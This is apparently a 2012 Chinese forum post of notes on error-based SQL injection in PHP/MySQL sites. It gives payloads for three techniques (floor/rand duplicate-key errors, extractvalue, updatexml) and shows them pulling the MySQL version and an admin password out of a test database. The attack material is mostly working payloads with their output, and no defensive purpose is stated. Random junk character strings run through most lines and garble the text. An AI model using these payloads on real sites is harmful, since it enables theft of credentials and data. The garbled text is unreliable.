放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。7 _8 K# e9 t9 c# d/ k0 q
实际测试环境:' k" N) H4 r7 b6 s
7 x( t% i( h9 d
% Y K) t* Q/ W* C
mysql> show tables;8 g% u G* ] _2 F$ A4 s, _
+----------------+0 T& r; E9 }: d! m
| Tables_in_test | q. R% X9 d4 ?
+----------------+
. C! [6 _8 I( t$ K2 G' G| admin |0 ]/ a3 s- L1 Z
| article |+ Y$ l9 D) |1 ^
+----------------+
" u( D8 c) u% o4 t , V* o: C# U5 `$ q- l
! V9 z' o% x0 G+ ^8 ?- ^
& a$ a- P2 K$ A2 T; K
mysql> describe admin;6 ?2 Z, U' b0 b* J! A" R8 u8 ?
+-------+------------------+------+-----+---------+----------------+
+ d* U: H% H3 l; C. F. b| Field | Type | Null | Key | Default | Extra |9 s' H1 c3 a) |
+-------+------------------+------+-----+---------+----------------+
# l) ~% M$ P* b! ?( @/ {' Z! m| id | int(10) unsigned | NO | PRI | NULL | auto_increment |2 }7 U7 `3 E; V* x" |
| user | varchar(50) | NO | | NULL | |
5 n y8 T9 w( m5 X; S| pass | varchar(50) | NO | | NULL | |% o$ a+ B- M% F4 T9 {
+-------+------------------+------+-----+---------+----------------+: h# ^* d( l8 } q% ~ F6 p
( b; X$ b; N; T( M/ Y2 D
( S3 L- h, y# F. _& ] X7 X
7 c- i. i0 Z4 w8 U Fmysql> describe article;3 K& P7 H D0 f% X9 A# Z
+---------+------------------+------+-----+---------+----------------+
% N, t0 [& [% Q( b+ b3 Q5 i| Field | Type | Null | Key | Default | Extra |
8 h6 N5 k( S# x. w8 _+---------+------------------+------+-----+---------+----------------+
1 m1 f3 ~5 a. O0 u| id | int(10) unsigned | NO | PRI | NULL | auto_increment |/ K* r6 _8 d/ x
| title | varchar(50) | NO | | NULL | |7 Q$ ^) F; j. f4 x
| content | varchar(50) | NO | | NULL | |
( a I& b+ G8 r' {& T* q7 L& K0 e+---------+------------------+------+-----+---------+----------------+
5 G/ {8 M4 l; j' l" j" V) z8 c2 [1、通过floor报错
4 z S, \6 G8 T: E可以通过如下一些利用代码( m( K: y) i( P! g w0 x% H: j( e
* h1 h; t; p* {' O ( T$ I) ^! O( e3 d* w
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x3 `6 c0 S' y% z# V
from information_schema.tables group by x)a);
+ [% f) K& j3 ]' @1 l. C
O& j0 h* a3 G/ d& S 7 P" s" p% K8 G$ s( }" T: Y
and (select count(*) from (select 1 union select null union select !1)x5 V! s% e" a, ]: x3 b% @9 s
group by concat((select table_name from information_schema.tables limit 1),
7 P& c0 K# m4 H7 {8 \) n Efloor(rand(0)*2)));
/ Q- j# [, p9 {举例如下:5 z7 I6 G4 C; s0 C1 A& l3 e! `
首先进行正常查询:
/ h ^/ W- j0 N- l g8 C 6 J7 V8 R8 w8 f/ o9 R E
mysql> select * from article where id = 1;
0 c, b/ e; R& S+----+-------+---------+
+ E6 ^; a8 v" c+ M$ V8 \+ p: M| id | title | content |: D+ P2 b/ B# G2 u. f2 T: U
+----+-------+---------+ o' n7 I, n5 x \
| 1 | test | do it |5 o* G6 z0 q# l2 u2 z' ~
+----+-------+---------+! W. \" S' O/ N R/ H/ v. p; E6 D
假如id输入存在注入的话,可以通过如下语句进行报错。
/ e+ C0 a% P" T7 z3 n3 Y 3 V- d0 m: u, {8 U
; @' u8 a0 e8 J. a5 ?) I6 ]
mysql> select * from article where id = 1 and (select 1 from# Z6 R" \% |. W. }4 n0 Q: J
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);7 J, s. L& f- N) M) B& H& Z0 k
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'% H9 w; n! d. V1 a
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。) E( B/ P: \6 E7 x) s! |* c
例如我们需要查询管理员用户名和密码:
3 [/ H& D4 k9 Y9 v, hMethod1:
4 M+ r4 d0 D% f- N" g5 } 6 A5 ~( A. Q' l. e8 |
1 K! @5 y" k* n9 p( I4 o
mysql> select * from article where id = 1 and (select 1 from
4 y( H* s* l i( O& `* m A/ D: V(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
- }# u& p" G; j* d1 }! B1 s* t u, mfrom information_schema.tables group by x)a);
: T q2 l0 s2 q( m$ U, K" l% uERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
$ ?" s: Z5 C& e0 @( ^) iMethod2:& x; ?1 j" a) {, e# I+ W
' h1 s: Z+ {* y* V; ~( a
3 q' U) k# ~/ M0 C1 G; k+ H9 omysql> select * from article where id = 1 and (select count(*)
' w2 i2 ~' F. w9 n, B' Y4 xfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
8 \% @! r1 b; e' }floor(rand(0)*2)));" C# @! W r4 Z
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
. _1 H6 t5 z8 H' _1 `# M& u2、ExtractValue
+ N' ]- @; t5 |, G测试语句如下7 `2 d( Q4 h3 p. P' w9 `
* v% B$ g G) t6 ] + B% G# l6 X, Y
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
" w! ^7 ~6 J7 W9 y3 N! M实际测试过程* A; D- @8 \& j- h3 I; g
! R' e, \6 A, l# ` A" e
3 [4 \& i' M: E/ Q, s; g0 {/ M
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,% F, O3 U( l4 a' D: f. w: p
(select pass from admin limit 1)));--" v5 h, ^/ B% s% N# f2 `
ERROR 1105 (HY000): XPATH syntax error: '\admin888'5 Q i, F Z* o
3、UpdateXml- E [; X8 ?: \. k" f( f6 c _" @
测试语句
' [ V' g# [3 Y/ z b% o9 q
; {/ E' X% w% i* _9 [
4 F! j/ b; i; O0 P% R- a9 h0 B. Pand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
' c: D+ x9 k/ U( U实际测试过程
9 g8 _5 T% G: \) }
# `' F4 T% d9 P5 v! s) f * m1 R) ]1 x2 l5 t; f4 s
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
4 X i* T/ a& D# c$ x* ^(select pass from admin limit 1),0x5e24),1));
" c" ]1 |6 l- U: u8 W4 y }; DERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'; @* d! }2 c* A. v8 e. a
All, thanks foreign guys.
& R# ^) R" L2 Y/ N 5 k9 o' g* Y6 u8 H# t, ^
) P3 s8 v0 S% `
|
发表于 2012-12-10 10:28:51
收藏
支持
反对